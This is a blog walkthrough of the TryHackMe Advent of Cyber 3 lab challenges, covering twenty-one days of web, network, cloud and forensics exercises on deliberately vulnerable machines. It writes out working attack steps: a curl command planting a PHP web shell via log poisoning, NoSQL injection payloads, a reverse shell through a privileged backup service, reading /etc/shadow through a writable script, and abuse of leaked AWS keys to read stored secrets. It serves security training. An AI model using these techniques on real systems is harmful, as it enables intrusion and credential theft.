TryHackMe ‘Advent of Cyber 3’ Walkthrough

Alright. This is going to be quite a lengthy post as events get added, but I thought I’d collect all of my personal walkthroughs for TryHackMe’s Advent of Cyber 3 event here. This is a pretty basic intro to some infosec topics and a surface-level look at their applications. I know there are official video walkthroughs for each task (and many other walkthroughs, I’m sure), but this is my take on them in the least complicated way possible (I hope). I will be amending this post as more challenges are added, so stay tuned.


Day 1    Day 6     Day 11    Day 16    Day 21
Day 2    Day 7     Day 12    Day 17
Day 3    Day 8     Day 13    Day 18
Day 4    Day 9     Day 14    Day 19
Day 5    Day 10   Day 15    Day 20

Day 1

On day 1, we’re taking a look at IDOR vulnerabilities. This one is very simple to get your feet wet.

When you navigate the site and its pages, you’ll notice that the Your Activity page has a parameter value in the URL that we can manipulate. Play around with this until you find “Santa”.


Once you find “Santa”, you can answer the first question.


Keep manipulating the parameter value until you find “McStocker”, and you will have your answer to question 2.


Continue manipulating the value until you find your culprit and his position in the company and you have your answer to question 3.


Revert all of the changes made by the Grinch and you will receive your flag to answer question 4. We’re done! Piece of cake.

Day 2

On day 2, we explore manipulating cookies for malicious use. This one is also fairly simple. Let’s hop in.

Open the provided website and register an account.


Notice that you will get some kind of error message with your registration. But if you toggle Developer Tools in Firefox and navigate over to the Storage tab, under Cookies you will see a cookie name and value for the account you tried registering. Here you have your answer to the first question.


If you look at the cookie value, you’ll see it uses only the digits 0-9 and the letters a-f. This is characteristic of hexadecimal format. This is your answer to question 2.

Question 3 threw a lot of people off. If you use CyberChef to decode the value of your cookie “from hex”, you will get the output below. If you know what JSON looks like, you’ll recognize this as a basic JSON object:

{ "first" : "John" , "middle" : "K", "last" : "Doe" }

This is the answer to your 3rd question.


Now, take this output, copy it to the input field, and change the value of username to “admin”. Convert this “to hex” with the delimiter changed from “Space” to “None”, and you will have the answer to your next question.
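If you’d rather skip CyberChef, the same hex round trip can be done on the command line with xxd. The JSON below is illustrative; use the decoded value of your own cookie with the username changed to admin:

```shell
# Encode the forged JSON to a hex string suitable for the cookie value
cookie=$(printf '{"username":"admin"}' | xxd -p | tr -d '\n')
echo "$cookie"
# Decode it back to confirm the round trip
echo "$cookie" | xxd -r -p
```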


Take this value over to your browser and in Developer Tools, edit the cookie value for user-auth.


Once you refresh this page, you will be logged in as admin and here you have the answer to your next 2 questions.


Well done! Day 2 complete.

Day 3

In day 3, we are taking a look at some simple directory bruteforcing and authentication bypass. This one is also fairly simple, so let’s just dive right in.

Spin up the machine and, using either THM’s AttackBox or a VPN connection, run dirb to discover the directory for the admin panel. Here you will find the answer to your first question.


Once you find this directory, navigate over to it in your browser and attempt to log in as “administrator” with one of the default passwords. Once you figure out which one, you will have your answer to question 2.

And once you complete the login, you will have the answer to your last question and completed day 3’s challenge. Great job!

Day 4

Day 4 is where things start to get a little more complex, especially if you’ve never used Burp Suite before. We will be using it to run a simple password-list attack on the login form.

Launch the machine and navigate to the website. We see it’s a login form. We know from the question that the user is “santa”. Launch Burp Suite, head over to the “Proxy” tab, make sure “Intercept is on”, then log in with a dummy password and capture the request.


If you continue to forward the request, you will see “Invalid username and password”. Note this for later.


Right click anywhere on this request and select “Send to Intruder”. Head over to the “Intruder” tab. And under the “Payloads” tab, make sure that “Simple list” is selected as “Payload type” and Load the passwords.txt file that you downloaded. This list should populate in the box.


Now head over to the “Options” tab and scroll down to “Grep – Match”. Clear the previous list and in the bottom add the error message that we previously saw: “Invalid username and password”. This value will populate in the box.


Head over to the “Positions” tab in Intruder and clear out the selected positions.


With your mouse, highlight only the password value and click Add to set your attack position on the password value.


Now here’s the fun part. Click “Start attack”.


You will notice that every password attempt that matches our “Invalid username and password” string gets a status of 200. The one that does not match is your correct password. This is your answer to the first question.

Once you log in using these credentials, you will find your flag and answer to your last question. That’s it! Day 4 done.

Day 5

In day 5, we will take a look at a simple XSS vulnerability.

Log into the site with the credentials provided. And under “Settings”, reset McSkidy’s password to “pass123”.


Select one of the threads and add a comment checking to see if it is processed. We will start with simple HTML.


As you can see, our HTML is processed and “world” is underlined. That means our comment field is vulnerable.

Leave the provided payload as a comment. This XSS payload will change any viewing user’s password to “pass123”. You can include text to make it less suspicious, but I left it blank. Either way, it will still trigger the XSS.


Once you’re done, log in as grinch with pass123 and, under “Settings”, disable the Buttmas plugin to reveal your flag.

With this, you are done with day 5. Congrats!

Day 6

Day 6 picks back up and gets a little more involved. Here we will examine a local file inclusion vulnerability to extract some info.

Launch the machine and head over to the URL. You will see an error message because we are not logged in. If you take a look at the URL, though, we will find a parameter and value we can manipulate. This is the answer to your first question.


Change the value to read the first flag and answer question 2.

Use the PHP filter technique provided to retrieve the value of $flag from index.php. This will be displayed in base64, so copy the entire string and head to a base64 decoder to decode it. Once decoded, you will see your flag and the answer to question 3.


From that same decoded text, you will see your next target: ./includes/creds.php


Using the same PHP filter, extract the username and password hash.


Once again, head over to your base64 decoder and decode it. Here you will get your answer to question 4. Format is username:password

Using those credentials, log into the site and retrieve the flag for the server password under “Password Recovery”. This should be your answer to question 5.


The next task is a little more involved and I saw a lot of people complicating this one. Access the logs over at ./includes/logs/app_access.log. You will see the output displayed below.


Using your attacker machine and curl, issue the following command:

curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" ""
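One quoting note on the curl command: the backslash before $_GET is only needed because the header is wrapped in double quotes. With single quotes, the shell passes the PHP payload through untouched (either PHP quoting style for cmd works):

```shell
# Single quotes prevent the shell from expanding $_GET before curl sends it
payload='<?php system($_GET["cmd"]); ?>'
echo "$payload"
```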


If you reload the page with the access log, you will see the warning below. It says it cannot execute a blank command, which is good, because now we know that we can issue an actual command.


Append &cmd=hostname to your previous URL, and if you look at the output, you will see the result of your executed command, along with your answer to the last question.


And there you have it, we have completed Day 6. Awesome!

Day 7

On day 7, we’re taking a look at NoSQL databases. This was an interesting one because not a lot of people have the chance to interact with NoSQL databases and it also combined some elements from a previous day. Let’s dive right in.

First thing we do is SSH to our MongoDB server using the provided credentials. Once on the server, we can run the command mongo to interact with the database and issue the following commands to extract our first flag and the answer to our first question.


The next challenge asks us to use Burp Suite to intercept and modify the login request to bypass the login. So, open the URL in your browser and attempt to log in as admin with a dummy password.

Meanwhile, over in Burp Suite under the “Proxy” tab, make sure intercept is turned on to capture the login request. Once captured, we can modify the password parameter by inserting [$ne] or “not equals” (as shown below) to invalidate the password check.


Once you forward the request in burp and check your browser, you should be logged in as admin and have access to your 2nd flag and answer to the next question.
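For reference, the modified request body ends up looking something like this sketch. The field names username/password are assumptions based on the login form; adjust them to match what Burp actually captured:

```shell
# Build the injected body: password[$ne]=... means "password not equal to ...",
# which MongoDB evaluates as true for any real password
build_body() {
  printf 'username=%s&password[$ne]=%s' "$1" "$2"
}
build_body admin anything
```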


While logged in as admin, we will perform a search for “admin” while capturing the request over on burp.


Once we have this request captured, we can modify the GET request by inserting [$ne] (as shown below) for username and changing the role to “guest”.


We can now forward this request and take a look over at our browser, where we will see all of the guest accounts listed, including our next flag and answer to the next question.


Our last challenge here will once again use burp to capture and modify our request. This time we will perform a search for “mcskidy”.


Looking over at burp, we have captured this request and modified the request by inserting our “not equals” [$ne] for the role “user” (as shown below).


Once this request is forwarded and we take a look over on our browser, we can see mcskidy’s account details and the answer to our last question.


And with that, we are done with day 7. Yay!

Day 8

Day 8, we’re taking a look at some log analysis and a bit of open source intelligence (OSINT). This day was a bit long-winded but pretty straightforward if you followed along. So, let’s get into it.

If you load up the machine, you should have an RDP session to a Windows box. We’ll start by taking a look at SantasLaptopLogs on the Desktop.


If you take a look at the first powershell log file, you will quickly find the answer to your first question.


The systeminfo command that was run quickly gives you the answer.


The answer to our next question can be found in the 3rd log file.


If you take a look, you can see the net user command used to add the backdoor account “s4nta”.


Examining the last log file on this list, you will find the answer to our 3rd question.


Here you can see that the backdoor account “s4nta” copies a file over.


In this same log file, you can see the LOLbin binary that our backdoor account used to encode the UsrClass.dat file and your answer to the next question.


Once again using CyberChef as we did on day 2’s challenge, we copy the encoded block at the end of this same log file and decode it “from base64” and then download the decoded .dat file onto our machine to examine it with Shellbags Explorer (also available on the Desktop).
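If you prefer the terminal to CyberChef for this step, base64 -d does the same decode. The sample data below stands in for the real encoded block copied from the log:

```shell
# Decode a base64 blob from a file into a new file, as with the captured UsrClass.dat
printf 'aGVsbG8gd29ybGQ=' > encoded.txt
base64 -d encoded.txt > UsrClass.dat
cat UsrClass.dat
```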

Under File -> Load offline hive, select our decoded .dat file and open it.


If you expand the directories in the left pane, you will quickly find the answer to the 5th question. The question hints at “publicly accessible software hosted”.


The next question asks us to find the file under the “Bag of Toys” folder. Expand this folder and you will see your file.


The next couple of tasks involve a little OSINT action as we head over to Github to pick up a few things. If we look up the SantaRat software on Github, we will see who wrote it and get our answer to question 6.


If we check out Grinchiest’s other software repositories, we will see the other repository that seems interesting to our investigation and the answer to our next question.


Moving right along, we head back to our log files to find the name of the executable that our malicious user used to steal Santa’s bag of toys.


The 2nd log file on the list reveals our malicious .exe and the answer to the next question.


Now we take a look at our last log file (4th one in the folder) to find the contents of the malicious file placed by our backdoor account.


As you can see, the value “GRINCHMAS” was echoed into the malicious files (coal, mold, etc.) that replaced Santa’s actual content. This is the answer to our next question.


Back over on Github, looks like our malicious user left a trail in the commits for the “operation-bag-of-toys” repository. Open this commit and it will reveal the password and the answer to the next question.


Once you have this password handy, hop over to the Desktop of your Windows machine and open up the password protected archive using the password.


With this, you have recovered the original contents of Santa’s bag of toys and can answer your final question.


Yay! You have helped save Christmas and completed day 8’s challenge. Well done!

Day 9

Day 9’s challenge is also fairly simple. In this challenge, we take a look at some basic packet analysis using the venerable tool Wireshark. Let’s go for it.

Once you download the .pcap file provided by the challenge, you can proceed to open it with Wireshark.

Our first question asks us to find the directory of our first GET request. We can apply the filter http.request.method==GET and this will immediately reveal your answer.


Next we will use the filter http.request.method==POST to take a look at the POST login request that will reveal our username and password to answer the next question. This is under HTML Form URL Encoded. Answer format is username:password.


Using this same request, we can look under Hypertext Transfer Protocol to reveal our flag and answer to the next question.


If you use the filter dns.txt, we can reveal our TXT query response. Right-clicking and following the UDP stream will reveal your next flag and answer. I shall leave this one to you.


Using the ftp.request filter, we can quickly uncover the FTP password in plaintext. As you can see in the response below, it says “Login Successful”. This is the answer to our next question.


Using the same filter, we can see the FTP command used to upload our secret.txt file and answer our next question.


For our last question, we will use the ftp-data filter and under Line-based text data, we will reveal the content of our secret.txt file in plaintext. This answers your last question.


And with that, we are done with day 9. That wasn’t too bad, was it? Wireshark packet analysis can be pretty tedious when looking through very large .pcap files, but filters make it a whole lot easier. Wireshark’s documentation has tons of filters. Check them out here.

Day 10

Day 10 was a super easy challenge and walks us through some basics of nmap scanning. Nmap is an amazing and versatile tool to have in your arsenal. Let’s take a look.


The first task asks us to run a simple TCP scan with nmap -sT. This scan will answer your first 3 questions.


We are then asked to run a SYN scan with nmap -sS. As you can see the results are the same and you can answer your next question.


Next we are asked to run a version scan with nmap -sV to figure out the version of the web server running to answer our next question.

We are then told to navigate to this website and look up which CVE was fixed in version 2.4.51 of the Apache web server. Easy peasy.


Next we perform a scan of all TCP ports to pick up a port that was previously not detected because, without specifying otherwise, nmap only scans the 1000 most common ports.

Pro tip: If you don’t like waiting forever for an nmap all ports scan, check out this command: nmap -T5 --open -sV --min-rate=1000 --max-retries=2 -p- [ip address]

See how much faster this runs? Cool, huh?


This answers your last 2 questions and ends day 10’s challenge. Super!


Day 11

On day 11, we take a look at a bit of nmap and MS SQL. This one was also fairly straightforward, so let’s dive in.

To answer our first question, we run a quick nmap scan to find the port running MS SQL using nmap -Pn -sV. That was pretty easy. Let’s move on.


Next we use the sqsh command with the username and password provided to connect to the MS SQL instance and interact with the database to answer our next question.

To answer our next question, we will use the SQL query SELECT * FROM reindeer.dbo.names; to extract the contents of the names table in the reindeer database.

The next question has us extract the contents of the table schedule. We can use the same query from the previous example and adjust our values with SELECT * FROM reindeer.dbo.schedule;

We will do the same for the presents table to answer the next question using the query SELECT * FROM reindeer.dbo.presents;

For our last question, we will extract the contents of the flag.txt file from user grinch‘s directory using the MS SQL command xp_cmdshell. If you know Windows’ directory structure, this should be fairly simple, though you may have to do a little digging for the folder where it’s stored. We use type to read the file located at: C:\Users\Grinch\Documents\

And with that, we are done with day 11. Awesome!


Day 12

On day 12, we’re taking a look at Network File System (NFS) shares and mounts (with a bit of nmap peppered in). Let’s roll.

We start with running a quick nmap scan using nmap -Pn -sV [ip addr]. This should take care of your first 2 questions.


Next we run showmount -e [ip addr] and view the shares available. This will answer the next 2 questions.


We are then asked to create the directory tmp1 using mkdir tmp1 and mount [ip addr]:/my-notes tmp1 to mount the share to tmp1. As you can see below, we get an error here. That means we can’t mount and view this share publicly.


I switched to the AttackBox for the rest of these as we were getting some errors via VPN, so that’s why these screenshots look slightly different.

If we mount the share named share using mount [ip addr]:/share tmp1 and take a look at the contents, we can see 2 text files.


If we open 2680-0.txt using nano (or any editor of choice), we can see the title and answer to our next question.


We are then asked to find the share where the malicious user left his id_rsa ssh key behind. We can safely assume where this would be and can answer the next question. We can mount the share using mount [ip addr]:/confidential tmp1 and view its contents.


Last we are tasked with finding the MD5 sum of id_rsa. We can do this simply using md5sum and answer our last question.

And with this, we are done with day 12. Great!


Day 13

On day 13, we’re getting into some Windows cmd (or PowerShell) commands to gather some info, as well as some simple reverse shell exploitation using a running service with privileges. Let’s check it out.

First we are asked to find the user starting with the letter “p”. For this, we will use net users. Simple.


Next, we are asked to find the version of the operating system running. We can do this using systeminfo | findstr /B /C:"OS Name" /C:"OS Version". The command provided by the challenge isn’t typed out correctly, so if you copy it directly, you will get an error. This will save you a bit of headache. This answers your next question.


The 3rd question asks us to find the backup service that is running (we know it’s Iperius from the text above). We can look this up by running wmic service list.


Next question can also be answered from this same output.


This is where things get a bit more fun and interesting. We’re going to exploit the running backup service to get a reverse netcat shell on our attacker machine.

Open the Iperius Backup program from the programs list and select Create new backup.


Under the Items tab, add a folder to backup. This can be any folder. We used the same one provided in the example.


Add C:\Users\McSkidy\Documents and click OK.


Under the Destinations tab, add a destination folder. Again, we used the one from the example.


Add C:\Users\McSkidy\Desktop and click OK.


Open up Notepad from the programs list, copy in the simple .bat script provided, and save the file. I named it shell.bat and saved it on the Desktop. Name and location do not matter. Remember to change the IP address to the IP of your attacker machine.


On your attacker machine, open up a netcat listener using nc -nlvp 1337 to catch our shell.


Back in Iperius, under the Other processes tab, select Run a program or open external file and choose the shell.bat that we previously created and click OK.


Now on the home page, right-click on your created backup job and select Run backup as service.


If you wait a minute or so, you should get a shell on your attacker machine.


Now you can run your last few commands to answer the last 3 questions. First we will run whoami.


Next we will find the flag.txt in the Grinch’s Documents folder.


And we find the answer to the last question by viewing the Schedule.txt file in the same folder.


And voila! We are done with day 13. That one was pretty cool, huh?


Day 14

On day 14, we’re taking a look at exploiting insecure permissions to extract information. This one was pretty quick and straightforward.

We start by using dirb to enumerate the site’s directories with its default settings. With this, we can answer our first question.


Over on the AttackBox, we cd to thegrinch’s scripts directory and reveal the answer to our next question.

You will notice that the script has write permissions for our user mcskidy, meaning we can edit this file.
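A quick way to confirm that write bit before editing is to check the permission string (apology.sh here is a stand-in name for the real script):

```shell
# The "w" bits in the group/other positions are what let another user edit the file
touch /tmp/apology.sh
chmod 664 /tmp/apology.sh
stat -c '%A' /tmp/apology.sh
```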


We edit this file to read the contents of the /etc/shadow file.


If you give it a minute or so and navigate over to the /admin directory discovered earlier, you will see the script output reflected. This should answer your 3rd question.


Edit the script again to read the contents of the flag.txt file on thegrinch’s Desktop.


Once again, give it a minute or so and head over and reload the webpage from before. This will give you the answer to your last question.


And with that, we are done with day 14. We are more than halfway there!


Day 15

So, day 15 wasn’t a challenge at all, but an infosec “aptitude quiz” of sorts. Based on your answers, an infosec career path is determined along with some suggested TryHackMe learning paths to complete. My results are below.

Nothing else for day 15. See you all tomorrow!

Day 16

Day 16 was short and sweet as we take a look at some basic OSINT techniques.

The challenge starts us off with a ransomware message written in Russian. It’s pretty obvious what the answer to our first question is, but we can translate this message to read its contents, if needed.

Doing a quick search for this username, we quickly find the Twitter account belonging to our user. This answers our next question.

Clicking on this Twitter profile, we can see that the pinned tweet has the info for our next 2 questions. I’ll leave the specifics up to you.

If we navigate over to our user’s profile, we can see his bitcoin address and the answer to our next question. We can also see that this user has a Github account tied to this profile. This also answers our next question.

The next question involves something that we got a taste of on our day 8 challenge. If we do some digging in the user’s Github account, we find a commit in the ChristBASHTree repository.

Taking a look at this commit, we can see that the user deletes a previously added entry of his email address. With this we can answer the last 2 questions.

And that’s it for day 16. Great job.

Day 17

Day 17’s challenge was pretty cool and useful, especially if you don’t have much interaction with Amazon Web Services (AWS). Let’s hop right in.

We are given an image and tasked with finding the name of the S3 bucket used to host it. This is fairly straightforward from the info provided in the challenge.

We can right-click the image and go to its actual image location. With this, we can answer our first question.

Next, we are asked to find the contents of the flag.txt file stored in this bucket. We can just use curl to dump its contents. Pretty simple.

We can use aws s3 ls s3:// --no-sign-request to list the other files in the bucket. We can immediately spot one that catches our eye.

We can download the file locally using curl --output

Make sure to include --output otherwise curl will just output everything on your screen and that does us no good.

Unzip the archive and we can see a wp_backup folder is extracted.

If we navigate to this directory, we can see that this appears to be a standard WordPress site and therefore any interesting credentials will be in wp-config.php

We are looking for the AWS Access Key ID in this file, so we can simply cat wp-config.php | grep AKIA to get this directly.

Alternatively, we can use an editor and search through the file.

We can use the info above to create a profile test (you can name this whatever you want) with the command provided in the challenge aws configure --profile test

In order to extract the AWS Account ID, we can use aws sts get-access-key-info --access-key-id AKIAQI52OJVCPZXFYAOI --profile test

Be sure to include the profile that you created above.

We are then asked to find the username for the access key. We can do this once again using our profile with aws sts get-caller-identity --profile test

In order to locate the EC2 instance in this account, we can use aws ec2 describe-instances --output text --profile test | grep TAGS

Once again, don’t forget your profile and using grep just makes this a bit easier to read.

The last thing we need to do is extract the database password stored in the Secrets Manager in this instance.

We can do this by first listing the secret IDs in the Secrets Manager using aws secretsmanager list-secrets --profile test

We can see a command reference list for secretsmanager here.

Using aws secretsmanager get-secret-value --secret-id HR-Password --profile test we get the output below.

This tells us that the string we are looking for is not available in this region i.e. us-east-1, the region we set for our profile. It tells us to look closer to where Santa “lives”.

We can use something like this to check for other available regions. Basically we need something closer to the North Pole.

We can modify our command to use aws secretsmanager get-secret-value --secret-id HR-Password --region eu-north-1 --profile test

And with that, we have the answer to our last question.

Day 17 complete. Well done.

Day 18

Day 18 brings us another relevant challenge. Here we take a look at some container technology, specifically Docker images.

Using the provided AttackBox, we can take a look at the available images with docker images

This answers our first question.

We can pull down a specific image to investigate locally using docker pull

We can run and interact with the container with docker run -it

With an interactive shell inside the container, we can issue standard *nix commands, such as ls -la

To answer our last 2 questions, we create a directory with mkdir aoc and navigate over to it.

We then use docker save -o aoc.tar to download it as a tar archive and extract it using tar -xf aoc.tar

Using cat manifest.json | jq we can see the .json config file used to build the container image, as well as a collection of image layers.

Once you locate the layer of particular interest to us, we can navigate to its directory and extract the layer.tar.

From here, we can use cat root/envconsul/config.hcl | grep 'token' to find our token and answer our last question.

And with this, we have completed day 18.

Day 19

Day 19, we’re taking a look at some email phishing. This one was quick and fun, so let’s get to it.

Using the provided AttackBox, we open the email program.

Once we do, we are greeted with an email. This email will help us answer our first few questions.

We can see who the recipient of the email is below.

We can also see who the sender is.

We can see that the reply-to email is different from the sender’s email. This is pretty common practice in phishing attempts.

Also common among phishing attempts are misspellings. If we look at the body of the email, we can spot the spelling error.

If we hover over the reset password button, we can see the URL that we are being directed to on the bottom left corner of our email application. This is good practice before randomly clicking in suspicious emails.

We are then asked to view the source of the email.

Looking through the email source, we can immediately spot the suspicious looking email header.

We are then asked to look at similar emails sent by colleagues. For this, we can take a look at the Email Artifacts folder on the Desktop.

If we open the attachment.txt file, we can see the name of the attached PDF in the emails.

The answer to our last question is a bit more involved, but pretty straightforward. In order to find the flag, we will use the attachment-base64-only.txt file located in that same folder.

We can open up a terminal and use cat attachment-base64-only.txt | base64 -d > file.pdf to decode the base64 block and output it to PDF.
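A quick way to confirm the decode worked is to check for the PDF magic bytes before opening the file. The base64 here is just a minimal PDF header, standing in for the real attachment block:

```shell
# Decode and verify the file starts with %PDF- before trying to open it
printf 'JVBERi0xLjQK' | base64 -d > file.pdf
head -c 8 file.pdf
```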

If we look back in our folder, we can see the file.pdf

We can now simply open the PDF to retrieve our flag.

And with that, we have completed day 19. Great.

Day 20

Day 20 was short and sweet as we’re introduced to properly handling and analyzing suspicious files.

On our AttackBox, we are asked to examine the testfile on the Desktop using the strings command and recording its output. Simple enough.

Next, using the command file, we can see its file type.

In order to further investigate this file, we calculate its MD5 hash using md5sum.
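The three triage commands chain together naturally; here they are run against an illustrative sample file (testfile on the AttackBox is the real target):

```shell
# Create a stand-in file, then inspect it the same way as testfile
printf 'hello' > sample.bin
strings sample.bin    # dump printable strings
file sample.bin       # identify the type from magic bytes
md5sum sample.bin     # hash to look up on VirusTotal
```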

Taking this hash over to VirusTotal, we can run a search.

If we head over to the Details tab, we can spot the “First Seen In The Wild” date.

Under the Detection tab, we can see Microsoft’s classification for this file.

We are then asked to navigate over to this link and answer our last 2 questions.

Here we find what the file used to be named.

And the maximum characters allowed in the file.

And with that, we are done with Day 20. Almost at the finish line.

Day 21

On day 21, we’re looking at some basic YARA rules for detecting patterns in malicious files. This was another quick one, so let’s hop right in.

First, we create a new document named eicaryara on the desktop of our AttackBox with the provided rule in the example (shown below).

We can run the following examples against the testfile (also found on the desktop) using our eicaryara rule file.

You can answer the first question if you are familiar with operators: ‘and’ requires every condition to match, while ‘or’ matches if any one does.

Our second question asks which option is used to extract the metadata that are a hit to a file. We know this is -m from the example provided.

Our third questions asks in which section of our rule can we find the ‘author’ information. We know this is the ‘metadata’ section.

We can take a look at the -h (help) menu for yara to answer our next question. -n is the option that we need to print rules that did not hit.

Our last question has us change the ‘O’ (letter) to a ‘0’ (zero) in our yara rule file and save.

If we run yara with the -c option (count), we can see the result and answer to our last question.

That’s it for day 21. See you all soon.